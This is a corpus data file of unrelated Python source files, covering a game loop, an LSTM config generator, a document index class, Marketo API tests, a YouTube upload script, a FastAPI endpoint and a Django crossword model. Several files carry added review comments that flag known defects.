        @param entity_manager Loads entities into the game based on the state being switched to.
        @param system_manager Manipulates the systems that are to be executed.
        @param input_manager Controls which inputs are listened for and how they
        interact with systems and entities.
        @param asset_manager Contains the assets used by SFML's renderer."""
        self._window = window
        self._view = view
        self._state_loader = state_loader
        self._entity_manager = entity_manager
        # FIX: was `self._self._system_manager = system_manager`, which raised
        # AttributeError (no `_self` attribute exists) during construction.
        self._system_manager = system_manager
        self._input_manager = input_manager
        self._asset_manager = asset_manager
        # Measures time since the last key press.
        self._last_key_press_timer = sf.Clock()
        # False while the player has clicked outside the window ("paused").
        self._is_window_active = True
        self._is_quit = False
    def close(self):
        """Close the underlying SFML window."""
        self._window.close()
    def is_quit(self):
        """Return True once a quit has been requested."""
        return self._is_quit
    def process_inputs(self):
        """Drain the SFML event queue and forward each event to the input manager."""
        for event in self._window.iter_events():
            if event.type == sf.Event.MOUSE_MOVED:
                self._input_manager.mouse_has_moved(self._window.convert_coords(event.x,event.y))
            #elif event.type == sf.Event.TEXT_ENTERED:
                #InputManager.key_input(event.unicode, True, self._last_key_press_timer.elapsed_time)
                #self._last_key_press_timer.restart()
            elif event.type == sf.Event.KEY_PRESSED:
                self._input_manager.key_input(event.code, True, self._last_key_press_timer.elapsed_time)
                # A new key was just pressed, so restart the inter-keypress timer.
                self._last_key_press_timer.restart()
            elif event.type == sf.Event.KEY_RELEASED:
                # The elapsed time isn't necessary for a released key.
                self._input_manager.key_input(event.code)
            elif event.type == sf.Event.MOUSE_BUTTON_PRESSED:
                self._input_manager.mouse_input(event.button, True)
            elif event.type == sf.Event.MOUSE_BUTTON_RELEASED:
                self._input_manager.mouse_input(event.button,False)
            elif event.type == sf.Event.CLOSED:
                # FIX: the original iterated over an undefined module-level
                # `lNextState` here (NameError on window close); flagging quit
                # is all that is achievable from this scope.
                self._is_quit = True
            elif event.type == sf.Event.LOST_FOCUS:
                self._is_window_active = False
            elif event.type == sf.Event.GAINED_FOCUS:
                self._is_window_active = True
    def update_frame(self, time_change):
        """Run one game-model update; no-op while the window lacks focus."""
        if self._is_window_active:
            #We don't want to change lNextState if the game has been set to QUIT
            if not self._is_quit:
                #lNextState will contain "NULL"s when no state change is signaled
                #lNextState will have all of its elements change when switching to a new state.
                lNextState = self._entity_manager.input_update()
                #Check to see if we have signaled to quit the game thus far
                if lNextState[0] == "QUIT":
                    self._is_quit = True
                #If one of the lNextState elements is changed, they all are (just how it goes.)
                if lNextState[0] != "NULL" and lNextState[0] != "QUIT":
                    # TODO Change to self._state_loader.load_state()
                    # NOTE(review): ChangeState, lCurrentState, window, view and
                    # entity_manager are not defined in this scope — this branch
                    # raises NameError if reached; confirm the intended call.
                    ChangeState(lCurrentState, lNextState, window, view, entity_manager)
            #After input is handled, update the game's model for this state.
            lNextState = self._entity_manager.logic_update(time_change)
            #Check to see if we have signaled to quit the game thus far
            if lNextState[0] == "QUIT":
                self._is_quit = True
            #If one of the lNextState elements is changed, they all are (just how it goes.)
            if lNextState[0] != "NULL" and lNextState[0] != "QUIT":
                # TODO Change to self._state_loader.load_state()
                # NOTE(review): same undefined names as above — confirm.
                ChangeState(lCurrentState, lNextState, window, view, entity_manager)
    def render_frame(self):
        """Draw the current frame; no-op while the window lacks focus."""
        if self._is_window_active:
            self._entity_manager.render_update(self._window, self._view)
            self._window.display()
388372 | #-*-coding:utf8-*-
import copy, os
from gen_conf_file import *
from dataset_cfg import *
def gen_nbp_lstm(d_mem, init, lr, dataset, l2, max_norm2, negative_num):
    """Build the layer-by-layer JSON-able config dict for the nbp_lstm model.

    Pipeline: (user, session-context) data -> embeddings -> session average
    pool -> LSTM -> last-state pool -> concat with user rep -> dropout ->
    full-connect softmax, with cross-entropy loss and top-5 accuracy outputs.

    Params: d_mem LSTM memory size; init uniform-filler range; lr SGD
    learning rate; dataset DatasetCfg key; l2 weight decay for LSTM updaters;
    max_norm2 LSTM weight-norm cap. NOTE(review): negative_num is accepted
    but never used in this body — confirm whether it was meant to be wired in.
    """
    net = {}
    ds = DatasetCfg(dataset)
    # --- shared fillers / updaters for the layers below ---
    g_filler = gen_uniform_filter_setting(init)
    zero_filler = gen_zero_filter_setting()
    g_updater = gen_sgd_setting(lr=lr, l2=l2, batch_size=ds.train_batch_size)
    zero_l2_updater = gen_sgd_setting(lr=lr, batch_size=ds.train_batch_size)
    g_layer_setting = {}
    g_layer_setting['no_bias'] = True
    net['net_name'] = 'nbp_lstm'
    net['need_reshape'] = False
    # --- per-phase net configs (Train/Valid/Test) ---
    net_cfg_train, net_cfg_valid, net_cfg_test = {}, {}, {}
    net['net_config'] = [net_cfg_train, net_cfg_valid, net_cfg_test]
    net_cfg_train["tag"] = "Train"
    net_cfg_train["max_iters"] = ds.train_max_iters
    net_cfg_train["display_interval"] = ds.train_display_interval
    net_cfg_train["out_nodes"] = ['loss','acc']
    net_cfg_valid["tag"] = "Valid"
    net_cfg_valid["max_iters"] = ds.valid_max_iters
    net_cfg_valid["display_interval"] = ds.valid_display_interval
    net_cfg_valid["out_nodes"] = ['acc']
    net_cfg_test["tag"] = "Test"
    net_cfg_test["max_iters"] = ds.test_max_iters
    net_cfg_test["display_interval"] = ds.test_display_interval
    net_cfg_test["out_nodes"] = ['acc']
    layers = []
    net['layers'] = layers
    # --- data layers: one per phase, emitting (u, c, c_len, y, ys) ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = []
    layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
    layer['layer_name'] = 'train_data'
    layer['layer_type'] = 73
    layer['tag'] = ['Train']
    setting = {}
    layer['setting'] = setting
    setting['batch_size'] = ds.train_batch_size
    setting['data_file'] = ds.train_data_file
    setting['max_session_len'] = ds.max_session_len
    setting['max_context_len'] = ds.max_context_len
    setting['train_or_pred'] = "train"
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = []
    layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
    layer['layer_name'] = 'valid_data'
    layer['layer_type'] = 73
    layer['tag'] = ['Valid']
    setting = {}
    layer['setting'] = setting
    setting['batch_size'] = ds.train_batch_size
    setting['data_file'] = ds.valid_data_file
    setting['max_session_len'] = ds.max_session_len
    setting['max_context_len'] = ds.max_context_len
    setting['train_or_pred'] = "pred"
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = []
    layer['top_nodes'] = ['u', 'c', 'c_len', 'y', 'ys' ]
    layer['layer_name'] = 'test_data'
    layer['layer_type'] = 73
    layer['tag'] = ['Test']
    setting = {}
    layer['setting'] = setting
    setting['batch_size'] = ds.train_batch_size
    setting['data_file'] = ds.test_data_file
    setting['max_session_len'] = ds.max_session_len
    setting['max_context_len'] = ds.max_context_len
    setting['train_or_pred'] = "pred"
    # --- embedding lookups for users (u) and session items (c) ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['u']
    layer['top_nodes'] = ['u_rep']
    layer['layer_name'] = 'user_embedding'
    layer['layer_type'] = 21
    setting = {}
    layer['setting'] = setting
    setting['feat_size'] = ds.d_user_rep
    setting['word_count'] = ds.num_user
    setting['w_updater'] = zero_l2_updater
    setting['w_filler'] = g_filler
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['c']
    layer['top_nodes'] = ['c_rep']
    layer['layer_name'] = 'item_embedding'
    layer['layer_type'] = 21
    setting = {}
    layer['setting'] = setting
    setting['feat_size'] = ds.d_item_rep
    setting['word_count'] = ds.num_item
    setting['w_updater'] = zero_l2_updater
    setting['w_filler'] = g_filler
    # --- average-pool item reps per session, then feed into the LSTM ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['c_rep']
    layer['top_nodes'] = ['c_rep_ave']
    layer['layer_name'] = 'session_ave_pool'
    layer['layer_type'] = 25
    setting = {'pool_type':'ave'}
    layer['setting'] = setting
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['c_rep_ave', 'c_len']
    layer['top_nodes'] = ['c_rep_lstm_input']
    layer['layer_name'] = 'gen_lstm_input'
    layer['layer_type'] = 48
    layer['setting'] = {}
    # --- LSTM over the session sequence ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['c_rep_lstm_input']
    layer['top_nodes'] = ['lstm_rep']
    layer['layer_name'] = 'lstm'
    layer['layer_type'] = 24
    setting = copy.deepcopy(g_layer_setting)
    layer['setting'] = setting
    setting['d_mem'] = d_mem
    setting['grad_norm2'] = 1000
    setting['max_norm2'] = max_norm2
    setting['grad_cut_off'] = 500
    setting['reverse'] = False
    setting['w_filler'] = g_filler
    setting['u_filler'] = g_filler
    setting['b_filler'] = zero_filler
    setting['w_updater'] = g_updater
    setting['u_updater'] = g_updater
    setting['b_updater'] = g_updater
    # --- keep only the last LSTM state, concat with the user embedding ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['lstm_rep']
    layer['top_nodes'] = ['lstm_rep_last']
    layer['layer_name'] = 'last_pool'
    layer['layer_type'] = 25
    setting = {'pool_type':'last'}
    layer['setting'] = setting
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['lstm_rep_last', 'u_rep']
    layer['top_nodes'] = ['pred_rep']
    layer['layer_name'] = 'concat'
    layer['layer_type'] = 18
    setting = {'bottom_node_num':2, 'concat_dim_index':3}
    layer['setting'] = setting
    # layer = {}
    # layers.append(layer)
    # layer['bottom_nodes'] = ['pred_rep']
    # layer['top_nodes'] = ['hidden_rep_linear']
    # layer['layer_name'] = 'transform'
    # layer['layer_type'] = 11
    # setting = copy.deepcopy(g_layer_setting)
    # layer['setting'] = setting
    # setting['num_hidden'] = n_hidden
    # layer = {}
    # layers.append(layer)
    # layer['bottom_nodes'] = ['hidden_rep_linear']
    # layer['top_nodes'] = ['hidden_rep_nonlinear']
    # layer['layer_name'] = 'activation'
    # layer['layer_type'] = 1 # relu 1 sigmoide 2 tanh 3
    # setting = {"phrase_type":2}
    # layer['setting'] = setting
    # --- classifier head: dropout -> full connect -> softmax loss / accuracy ---
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['pred_rep']
    layer['top_nodes'] = ['drop_rep']
    layer['layer_name'] = 'dropout'
    layer['layer_type'] = 13
    setting = {'rate':0}
    layer['setting'] = setting
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['drop_rep']
    layer['top_nodes'] = ['softmax_ret']
    layer['layer_name'] = 'softmax_fullconnect'
    layer['layer_type'] = 11
    setting = copy.deepcopy(g_layer_setting)
    layer['setting'] = setting
    setting['num_hidden'] = ds.num_item
    setting['w_filler'] = zero_filler
    setting['b_filler'] = zero_filler
    setting['w_updater'] = zero_l2_updater
    setting['b_updater'] = zero_l2_updater
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['softmax_ret', 'y']
    layer['top_nodes'] = ['loss']
    layer['layer_name'] = 'softmax_activation'
    layer['layer_type'] = 51
    layer['setting'] = {}
    layer = {}
    layers.append(layer)
    layer['bottom_nodes'] = ['softmax_ret', 'ys']
    layer['top_nodes'] = ['acc']
    layer['layer_name'] = 'accuracy'
    layer['layer_type'] = 56
    setting = {'topk':5}
    layer['setting'] = setting
    return net
# --- Hyper-parameter sweep: write one model config file per
# (init, lr, max_norm2, l2) combination; idx numbers the variants. ---
run = 5
# l2 = 0.
for dataset in ['tf']:
    for d_mem in [30]:
        idx = 0
        for init in [0.3, 0.1]:
            # for lr in [0.1, 0.03, 0.01, 0.003]:
            for lr in [0.3, 0.1, 0.03]:
                # for negative_num in [0]:
                for max_norm2 in [10, 1, 0.1]:
                    for l2 in [0.0]:
                        # NOTE(review): lstm_norm2 is assigned but never used.
                        lstm_norm2 = 1000
                        net = gen_nbp_lstm(d_mem=d_mem, init=init, lr=lr, dataset=dataset, l2=l2, \
                                max_norm2=max_norm2, negative_num=0)
                        net['log'] = 'log.nbp_lstm.{0}.d{1}.run{2}.{3}'.format \
                                (dataset, str(d_mem), str(run), str(idx))
                        # net["save_model"] = {"file_prefix": "./model/model."+str(idx),"save_interval": 5000}
                        # net["save_activation"] = [{"tag":"Valid","file_prefix": \
                        #                            "./model/valid."+str(idx), \
                        #                            "save_interval": 5000, \
                        #                            "save_nodes":["x","y","lstm_seq","word_rep_seq"], \
                        #                            "save_iter_num":1}]
                        gen_conf_file(net, '/home/wsx/exp/nbp/{0}/run.{1}/'.format(dataset, str(run)) + \
                                'model.nbp_lstm.{0}.d{1}.run{2}.{3}'.format \
                                (dataset, str(d_mem), str(run), str(idx)))
                        # gen_conf_file(net, '/home/wsx/exp/match/test/'.format(dataset, str(run)) + \
                        #         'model.lm_lstm_autoencoder.{0}.d{1}.run{2}.{3}'.format \
                        #         (dataset, str(d_mem), str(run), str(idx)))
                        idx += 1
| StarcoderdataPython |
4887390 | import os
import errno
from cse.util import PackerUtil
from bisect import bisect_left
class DocumentMap(object):
    """Read-only, two-level on-disk map from comment id (cid) to a file pointer.

    Level 1 is a pickled pair of parallel lists (cids, byte offsets) that
    points into level 2, a text index file of 'cid,pointer' lines. Lookup
    bisects the pickled lists to find the index snippet containing the cid,
    then bisects that snippet. Built by the indexer; usable as a context
    manager.
    """
    def __init__(self, document_map_index, document_map_dict):
        # Ensure the directory that will hold the index file exists.
        if not os.path.exists(os.path.dirname(document_map_index)):
            try:
                os.makedirs(os.path.dirname(document_map_index))
            except OSError as exc: # Guard against race condition
                if exc.errno != errno.EEXIST:
                    raise
        self.document_map_index_path = document_map_index
        self.document_map_dict_path = document_map_dict
        # Open file handle (level 2) and unpickled dictionary (level 1);
        # both stay None until open() is called.
        self.__index = None
        self.__dict = None
    def open(self):
        """Open both map files; raises FileNotFoundError if either is missing."""
        if os.path.exists(self.document_map_index_path):
            # NOTE: the builtin open() — this method only shadows the name
            # at class level, not inside its own body.
            self.__index = open(self.document_map_index_path, 'r')
        else:
            print(self.__class__.__name__ + ":", "No DocumentMap available...Please start indexer.")
            raise FileNotFoundError
        if os.path.exists(self.document_map_dict_path):
            self.__dict = PackerUtil.unpackFromFile(self.document_map_dict_path, type=PackerUtil.PICKLE)
        else:
            print(self.__class__.__name__ + ":", "No DocumentMap Dictionary available...Please start indexer.")
            raise FileNotFoundError
        return self
    def close(self):
        """Close the index file handle (the unpickled dict needs no cleanup)."""
        self.__index.close()
    def insert(self, cid, pointer):
        # Insertion is not supported anymore; the map is produced by the indexer.
        raise DeprecationWarning
    def get(self, cid):
        """Return the stored pointer for *cid*; FileNotFoundError if absent."""
        # First bisect the top-level dict to find the right index snippet,
        # then bisect within the snippet for the exact cid.
        pos = self.__get_dict_pos(cid, self.__dict[0])
        snippet = self.__get_index_snippet(pos)
        pos = self.__get_dict_pos(cid, snippet[0])
        if not snippet[0][pos] == int(cid):
            raise FileNotFoundError("DocumentMap doesn't contain cid: {}".format(cid))
        return snippet[1][pos]
    def __get_dict_pos(self, cid, list):
        # Bisect for cid; on a miss return the predecessor slot, which is the
        # snippet/entry whose range could contain cid.
        pos = bisect_left(list, int(cid))
        if len(list) == pos:
            return pos - 1
        if list[pos] == int(cid):
            return pos
        return pos - 1
    def __get_index_snippet(self, start_pos):
        """Read and parse one index-file region into parallel (cids, pointers) lists."""
        snippet = ([], [])
        start_offset = self.__dict[1][start_pos]
        try:
            # Region length = distance to the next offset...
            length = self.__dict[1][start_pos + 1] - self.__dict[1][start_pos]
        except IndexError:
            # ...or read to EOF for the last region.
            length = -1
        self.__index.seek(start_offset)
        text = self.__index.read(length)
        text = text.strip().split('\n')
        for line in text:
            cid, pointer = line.split(',')
            snippet[0].append(int(cid))
            snippet[1].append(int(pointer))
        return snippet
    def listCids(self):
        """Scan the whole index file and return every cid as an int."""
        cids = []
        self.__index.seek(0)
        for line in self.__index:
            cids.append(int(line.split(',')[0]))
        return cids
    def __enter__(self):
        return self.open()
    def __exit__(self, type, value, traceback):
        self.close()
| StarcoderdataPython |
# Require every registered responses stub to be hit; unexercised mocks fail
# the test run. (FIX: removed dataset-id residue fused onto this line.)
responses.mock.assert_all_requests_are_fired = True
class MarketoApi(unittest.TestCase):
    """Unit tests for the marketo_api wrapper, with HTTP mocked via `responses`.

    FIX: removed dataset-marker residue fused onto the final assertion.
    NOTE(review): the <EMAIL>/<PASSWORD> tokens are anonymization placeholders
    from the published source; they are kept verbatim because the stubs and
    assertions match on these exact strings.
    """
    @responses.activate
    def test_auth(self):
        """Client-credentials auth is performed before the first leads call."""
        marketo_auth_url = "".join(["https://066-eov-335.mktorest.com/", "identity/oauth/token?", "grant_type=client_credentials&client_id=123", "&client_secret=321"])
        marketo_auth_payload = {"access_token": "test"}
        responses.add(responses.GET, marketo_auth_url, json=marketo_auth_payload, status=200)
        marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
        marketo_leads_payload = {"result": [{"id": "test"}]}
        responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
        os.environ["MARKETO_CLIENT_ID"] = "fake_id"
        os.environ["MARKETO_CLIENT_SECRET"] = "fake_secret"
        marketo = marketo_api.MarketoApi()
        user = marketo.get_user("<EMAIL>")
        self.assertEqual(user, {"id": "test"})
    @responses.activate
    def test_get_user(self):
        """get_user returns the first lead record for the e-mail filter."""
        marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
        marketo_leads_payload = {"result": [{"id": "test"}]}
        responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
        marketo = marketo_api.MarketoApi()
        marketo.token = "<PASSWORD>"
        user = marketo.get_user("<EMAIL>")
        self.assertEqual(user, {"id": "test"})
    @responses.activate
    def test_get_newsletter_subscription(self):
        """The subscription flags of a lead are extracted from the lead payload."""
        marketo_lead_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/lead/test.json?", "access_token=test&fields=id,email,snapcraftnewsletter"])
        marketo_lead_payload = {"result": [{"snapcraftnewsletter": True}]}
        responses.add(responses.GET, marketo_lead_url, json=marketo_lead_payload, status=200)
        marketo = marketo_api.MarketoApi()
        marketo.token = "<PASSWORD>"
        subscription = marketo.get_newsletter_subscription("test")
        self.assertEqual(subscription, {"snapcraftnewsletter": True})
    @responses.activate
    def test_get_newsletter_subscription_bad_response(self):
        """An unexpected payload shape degrades to an empty dict, not an error."""
        marketo_lead_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/lead/test.json?", "access_token=test&fields=id,email,snapcraftnewsletter"])
        marketo_lead_payload = {"badkey": "bad"}
        responses.add(responses.GET, marketo_lead_url, json=marketo_lead_payload, status=200)
        marketo = marketo_api.MarketoApi()
        marketo.token = "<PASSWORD>"
        subscription = marketo.get_newsletter_subscription("test")
        self.assertEqual(subscription, {})
    @responses.activate
    def test_set_newsletter_subscription(self):
        """Setting the subscription POSTs to the leads endpoint and returns {}."""
        marketo_set_subscription_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
        responses.add(responses.POST, marketo_set_subscription_url, json={}, status=200)
        marketo = marketo_api.MarketoApi()
        marketo.token = "<PASSWORD>"
        response = marketo.set_newsletter_subscription("test", True)
        self.assertEqual(response, {})
    @responses.activate
    def test_token_refresh(self):
        """A 602 (expired token) triggers re-auth and a retry of the request."""
        marketo_leads_url = "".join(["https://066-eov-335.mktorest.com/", "rest/v1/leads.json?", "access_token=test&filterType=email", "&filterValues=<EMAIL>&fields=id"])
        marketo_leads_payload = {"result": [{"id": "test"}]}
        # First leads call fails with Marketo's 602 "token expired" status.
        responses.add(responses.GET, marketo_leads_url, status=602)
        marketo_auth_url = "".join(["https://066-eov-335.mktorest.com/", "identity/oauth/token?", "grant_type=client_credentials&client_id=123", "&client_secret=321"])
        marketo_auth_payload = {"access_token": "<PASSWORD>"}
        responses.add(responses.GET, marketo_auth_url, json=marketo_auth_payload, status=200)
        responses.add(responses.GET, marketo_leads_url, json=marketo_leads_payload, status=200)
        marketo = marketo_api.MarketoApi()
        marketo.token = "<PASSWORD>"
        marketo.get_user("<EMAIL>")
        # NOTE(review): "refreshed_token" vs the <PASSWORD> placeholder above is
        # an anonymization artifact of the published source — confirm upstream.
        self.assertEqual(marketo.token, "refreshed_token")
4954327 | <reponame>LocalghostFI/MuurameAllsky
#!/usr/bin/python
import http.client
import httplib2
import os
import random
import sys
import time
from apiclient.discovery import build
from apiclient.errors import HttpError
from apiclient.http import MediaFileUpload
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import argparser, run_flow
# Explicitly tell the underlying HTTP transport library not to retry, since
# we are handling retry logic ourselves (see resumable_upload below).
httplib2.RETRIES = 1

# Maximum number of times to retry before giving up.
MAX_RETRIES = 10

# Always retry when these exceptions are raised (transient transport errors).
RETRIABLE_EXCEPTIONS = (httplib2.HttpLib2Error, IOError, http.client.NotConnected,
                        http.client.IncompleteRead, http.client.ImproperConnectionState,
                        http.client.CannotSendRequest, http.client.CannotSendHeader,
                        http.client.ResponseNotReady, http.client.BadStatusLine)

# Always retry when an apiclient.errors.HttpError with one of these status
# codes is raised (server-side / gateway errors).
RETRIABLE_STATUS_CODES = [500, 502, 503, 504]

# The CLIENT_SECRETS_FILE variable specifies the name of a file that contains
# the OAuth 2.0 information for this application, including its client_id and
# client_secret. You can acquire an OAuth 2.0 client ID and client secret from
# the Google API Console at
#   https://console.developers.google.com/.
# Please ensure that you have enabled the YouTube Data API for your project.
# For the client_secrets.json file format, see:
#   https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
CLIENT_SECRETS_FILE = "/home/pi/allsky/scripts/client_secret.json"

# This OAuth 2.0 access scope allows an application to upload files to the
# authenticated user's YouTube channel, but doesn't allow other types of access.
YOUTUBE_UPLOAD_SCOPE = "https://www.googleapis.com/auth/youtube.upload"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"

# Message displayed if CLIENT_SECRETS_FILE is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the API Console
https://console.developers.google.com/
For more information about the client_secrets.json file format, please visit:
https://developers.google.com/api-client-library/python/guide/aaa_client_secrets
""" % os.path.abspath(os.path.join(os.path.dirname(__file__),
                                   CLIENT_SECRETS_FILE))

# Privacy statuses accepted by the --privacyStatus CLI option.
VALID_PRIVACY_STATUSES = ("public", "private", "unlisted")
def get_authenticated_service(args):
    """Run the OAuth2 flow (or reuse cached credentials) and return an
    authorized YouTube Data API client.

    args: the parsed argparse namespace expected by oauth2client's run_flow.
    """
    flow = flow_from_clientsecrets(CLIENT_SECRETS_FILE,
                                   scope=YOUTUBE_UPLOAD_SCOPE,
                                   message=MISSING_CLIENT_SECRETS_MESSAGE)
    # Credentials are cached on disk next to the script ("<script>-oauth2.json")
    # so the interactive flow only runs once.
    storage = Storage("%s-oauth2.json" % sys.argv[0])
    credentials = storage.get()
    if credentials is None or credentials.invalid:
        credentials = run_flow(flow, storage, args)
    return build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
                 http=credentials.authorize(httplib2.Http()))
def initialize_upload(youtube, options):
    """Build a videos.insert request from the CLI *options* and start the
    resumable upload.

    youtube: authorized API client from get_authenticated_service().
    options: argparse namespace with file/title/description/category/
             keywords/privacyStatus attributes.
    """
    tags = None
    if options.keywords:
        tags = options.keywords.split(",")

    body = dict(
        snippet=dict(
            title=options.title,
            description=options.description,
            tags=tags,
            categoryId=options.category
        ),
        status=dict(
            privacyStatus=options.privacyStatus
        )
    )

    # Call the API's videos.insert method to create and upload the video.
    insert_request = youtube.videos().insert(
        part=",".join(list(body.keys())),
        body=body,
        # The chunksize parameter specifies the size of each chunk of data, in
        # bytes, that will be uploaded at a time. Set a higher value for
        # reliable connections as fewer chunks lead to faster uploads. Set a
        # lower value for better recovery on less reliable connections.
        #
        # Setting "chunksize" equal to -1 means that the entire file will be
        # uploaded in a single HTTP request. (If the upload fails, it will
        # still be retried where it left off.) This is usually a best
        # practice, but on very old Pythons or App Engine use something like
        # 1024 * 1024 (1 megabyte) instead.
        media_body=MediaFileUpload(options.file, chunksize=-1, resumable=True)
    )

    resumable_upload(insert_request)
# This method implements an exponential backoff strategy to resume a
# failed upload.
def resumable_upload(insert_request):
    """Upload the media attached to *insert_request* chunk by chunk,
    retrying with exponential backoff on retriable HTTP status codes and
    transient transport exceptions.

    Exits the process (via exit()) on an unexpected response or after
    MAX_RETRIES failed attempts; non-retriable HttpErrors are re-raised.
    """
    response = None
    error = None
    retry = 0
    while response is None:
        try:
            print("Uploading file...")
            status, response = insert_request.next_chunk()
            if response is not None:
                if 'id' in response:
                    print("Video id '%s' was successfully uploaded." % response['id'])
                else:
                    exit("The upload failed with an unexpected response: %s" % response)
        except HttpError as e:
            if e.resp.status in RETRIABLE_STATUS_CODES:
                error = "A retriable HTTP error %d occurred:\n%s" % (e.resp.status,
                                                                     e.content)
            else:
                raise
        except RETRIABLE_EXCEPTIONS as e:
            error = "A retriable error occurred: %s" % e

        if error is not None:
            print(error)
            retry += 1
            if retry > MAX_RETRIES:
                exit("No longer attempting to retry.")

            max_sleep = 2 ** retry
            sleep_seconds = random.random() * max_sleep
            print("Sleeping %f seconds and then retrying..." % sleep_seconds)
            time.sleep(sleep_seconds)
            # BUG FIX: clear the error after handling it. The original left
            # `error` set, so a chunk that later *succeeded* still fell into
            # this branch and performed one more pointless backoff sleep
            # before the loop exited.
            error = None
if __name__ == '__main__':
    # CLI definition (argparser is provided by oauth2client.tools and already
    # carries the OAuth flow's own flags).
    argparser.add_argument("--file", required=True, help="Video file to upload")
    argparser.add_argument("--title", help="Video title", default="Test Title")
    argparser.add_argument("--description", help="Video description",
                           default="Test Description")
    argparser.add_argument("--category", default="22",
                           help="Numeric video category. " +
                           "See https://developers.google.com/youtube/v3/docs/videoCategories/list")
    argparser.add_argument("--keywords", help="Video keywords, comma separated",
                           default="")
    argparser.add_argument("--privacyStatus", choices=VALID_PRIVACY_STATUSES,
                           default=VALID_PRIVACY_STATUSES[0], help="Video privacy status.")
    args = argparser.parse_args()

    if not os.path.exists(args.file):
        exit("Please specify a valid file using the --file= parameter.")

    youtube = get_authenticated_service(args)
    try:
        initialize_upload(youtube, args)
    except HttpError as e:
        print("An HTTP error %d occurred:\n%s" % (e.resp.status, e.content))
| StarcoderdataPython |
286235 | <filename>src/rubrix/server/users/api.py
from fastapi import APIRouter, Depends
from rubrix.server.security.api import get_current_active_user
from .model import User
# All user-related endpoints are grouped under the "users" OpenAPI tag.
router = APIRouter(tags=["users"])


@router.get(
    "/me",
    response_model=User,
    response_model_exclude_none=True,
    operation_id="whoami",
)
async def whoami(current_user: User = Depends(get_current_active_user)):
    """
    User info endpoint: returns the authenticated user making the request.

    Parameters
    ----------
    current_user:
        The current request user, injected by the security dependency
        (rejects unauthenticated/inactive users before this body runs).

    Returns
    -------
    The current user
    """
    return current_user
| StarcoderdataPython |
12856143 | <reponame>fiee/croisee<filename>croisee/croisee/models.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
import unicodedata
import re, os
import logging
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.template.loader import render_to_string
from django.conf import settings
from django.contrib.auth.models import User
logger = logging.getLogger(settings.PROJECT_NAME)
# International characters that need an explicit multi-letter
# transliteration before accent stripping (plain accent removal would
# lose information for these).
REPLACEMENTS = (
    ('Ä', 'AE'),
    ('Ö', 'OE'),
    ('Ü', 'UE'),
    ('ß', 'SS'),
    ('Œ', 'OE'),
    ('Æ', 'AE'),
    ('Ø', 'OE'),
)

# strict mode: keep only A-Z.
reASCIIonly = re.compile(r'[^A-Z]', re.I)
# lenient mode: keep word characters plus the wildcard characters _ % ? *.
reCleanInput = re.compile(r'[^\w_%\?\*]', re.I)


def cleanword(word, strict=True):
    """Normalize *word* for crossword use: uppercase, transliterate
    umlauts/ligatures, strip accents, and remove disallowed characters.

    With strict=True only the letters A-Z survive; with strict=False word
    characters and the wildcards _ % ? * are kept as well.
    """
    result = word.upper()
    for src, dst in REPLACEMENTS:
        result = result.replace(src, dst)
    # Decompose accented characters (NFD), then drop the combining marks
    # by round-tripping through ASCII.
    result = unicodedata.normalize('NFD', result).encode('ASCII', errors='ignore').decode('ASCII')
    pattern = reASCIIonly if strict else reCleanInput
    return pattern.sub('', result)
def splitwordline(line):
    """Split a wordlist line into [word, description, priority].

    A line may contain word, description and priority separated by tabs.
    A missing description defaults to the word itself; a missing or
    non-numeric priority defaults to 0.  The word is normalized via
    cleanword() before returning.
    """
    parts = line.replace('\n', '').split('\t')
    if len(parts) == 1:
        parts.extend([parts[0], 0])
    elif len(parts) == 2:
        parts.append(0)
    elif len(parts) > 3:
        # BUG FIX: keep the first three fields. The original used
        # parts[0:2], which discarded the priority field entirely and made
        # the parts[2] accesses below raise IndexError for any line with
        # more than three tab-separated fields.
        parts = parts[0:3]
    # A description shorter than 2 characters is treated as missing.
    if len(parts[1]) < 2:
        parts[1] = parts[0]
    try:
        parts[2] = int(parts[2])
    except ValueError:
        parts[2] = 0
    parts[0] = cleanword(parts[0])
    return parts
class Dictionary(models.Model):
    """
    A dictionary: a named, language-tagged collection of crossword words
    owned by a user.
    """
    class Meta:
        verbose_name = _('Dictionary')
        verbose_name_plural = _('Dictionaries')
        ordering = ['language', 'name']
        # A user-visible name is unique per language, not globally.
        unique_together = (('name', 'language'),)

    name = models.CharField(_('Name'), max_length=31, help_text=_('A short descriptive name'))
    public = models.BooleanField(_('public?'), default=True, help_text=_('May everyone use this dictionary?'))
    language = models.CharField(_('Language'), max_length=15,
